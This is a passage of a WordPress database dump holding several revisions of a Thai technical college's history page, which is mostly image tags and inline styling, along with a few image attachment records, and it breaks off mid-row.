(3070, 3, '2018-06-18 15:57:50', '2018-06-18 08:57:50', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1200 aligncenter\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53-300x192.jpg\" alt=\"\" width=\"650\" height=\"417\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1204 aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"wp-image-1203 aligncenter\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"wp-image-1201 aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"wp-image-1202 aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-953 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"650\" height=\"442\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"650\" height=\"451\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44-300x219.jpg\" alt=\"\" width=\"200\" height=\"146\" />\r\n\r\n<img class=\"size-full wp-image-3065 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 15:57:50', '2018-06-18 08:57:50', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3071, 3, '2018-06-18 16:02:34', '2018-06-18 09:02:34', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"alignleft wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"150\" height=\"56\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"150\" height=\"56\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"150\" height=\"58\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"150\" height=\"57\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"150\" height=\"56\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:02:34', '2018-06-18 09:02:34', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3072, 3, '2018-06-18 16:04:34', '2018-06-18 09:04:34', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"alignleft wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"165\" height=\"64\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"165\" height=\"62\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"160\" height=\"60\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:04:34', '2018-06-18 09:04:34', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3073, 3, '2018-06-18 16:05:00', '2018-06-18 09:05:00', '', '17-5-2561 17-47-11', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-47-11-2', '', '', '2018-06-18 16:05:00', '2018-06-18 09:05:00', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg', 0, 'attachment', 'image/jpeg', 0),
(3074, 3, '2018-06-18 16:05:10', '2018-06-18 09:05:10', '', '17-5-2561 17-54-14', '', 'inherit', 'closed', 'closed', '', '17-5-2561-17-54-14-2', '', '', '2018-06-18 16:05:10', '2018-06-18 09:05:10', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(3075, 3, '2018-06-18 16:06:02', '2018-06-18 09:06:02', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"alignleft wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"165\" height=\"64\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"165\" height=\"62\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"160\" height=\"60\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:06:02', '2018-06-18 09:06:02', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3076, 3, '2018-06-18 16:07:15', '2018-06-18 09:07:15', '', 'biodiversity-21597-1', '', 'inherit', 'closed', 'closed', '', 'biodiversity-21597-1-2', '', '', '2018-06-18 16:07:15', '2018-06-18 09:07:15', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/biodiversity-21597-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3077, 3, '2018-06-18 16:08:48', '2018-06-18 09:08:48', '', '17-5-2561 18-05-19', '', 'inherit', 'closed', 'closed', '', '17-5-2561-18-05-19-2', '', '', '2018-06-18 16:08:48', '2018-06-18 09:08:48', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(3078, 3, '2018-06-18 16:09:12', '2018-06-18 09:09:12', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1194\" height=\"500\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n \r\n<h3><img class=\"alignleft wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n \r\n<h3></h3>\r\n<h3></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"160\" height=\"59\" /></h3>\r\n<h3><img class=\"alignleft wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"165\" height=\"64\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"165\" height=\"62\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignleft wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"160\" height=\"60\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: 